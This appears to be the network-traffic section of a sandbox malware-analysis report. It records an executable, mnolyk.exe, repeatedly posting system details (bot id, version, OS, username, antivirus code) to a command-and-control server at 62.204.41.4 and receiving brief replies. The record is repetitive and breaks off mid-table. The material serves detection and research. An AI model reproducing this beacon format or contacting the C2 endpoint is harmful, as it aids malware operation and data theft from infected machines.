Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:13.656697035 CET | 838 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:13.720968008 CET | 838 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
724 | 192.168.2.7 | 50419 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:13.897365093 CET | 839 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:13.959821939 CET | 839 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
725 | 192.168.2.7 | 50420 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:14.158818960 CET | 840 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:14.224035978 CET | 840 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
726 | 192.168.2.7 | 50421 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:14.406003952 CET | 841 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:14.470053911 CET | 841 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
727 | 192.168.2.7 | 50422 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:14.657367945 CET | 842 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:14.722737074 CET | 842 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
728 | 192.168.2.7 | 50423 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:14.904731989 CET | 843 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:14.969476938 CET | 843 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
729 | 192.168.2.7 | 50424 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:15.140263081 CET | 844 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:15.204756975 CET | 844 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
73 | 192.168.2.7 | 49768 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:07:20.940206051 CET | 188 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:07:21.005235910 CET | 188 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:20 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
730 | 192.168.2.7 | 50425 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:15.374875069 CET | 845 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:15.437989950 CET | 845 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
731 | 192.168.2.7 | 50426 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:15.811820030 CET | 846 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:15.874625921 CET | 846 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
732 | 192.168.2.7 | 50427 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:16.088952065 CET | 847 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 23:10:16.156971931 CET | 847 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
733 | 192.168.2.7 | 50428 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
Timestamp | kBytes transferred | Direction | Data
Feb 7, 2023 23:10:16.360692978 CET | 848 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:16.426949024 CET | 848 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      734 | 192.168.2.7 | 50429 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:17.103178024 CET | 849 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:17.167263985 CET | 849 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:17 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      735 | 192.168.2.7 | 50430 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:18.142734051 CET | 850 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:18.207896948 CET | 850 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      736 | 192.168.2.7 | 50431 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:18.720531940 CET | 851 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:18.785145998 CET | 851 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:18 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      737 | 192.168.2.7 | 50432 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:18.991988897 CET | 852 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:19.058875084 CET | 852 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      738 | 192.168.2.7 | 50433 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:19.240531921 CET | 853 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:19.304296017 CET | 853 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      739 | 192.168.2.7 | 50434 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:10:19.489028931 CET | 854 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:10:19.552669048 CET | 854 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:10:19 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      74 | 192.168.2.7 | 49769 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:21.212903023 CET | 189 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:21.278456926 CET | 189 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      740 | 192.168.2.7 | 50435 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
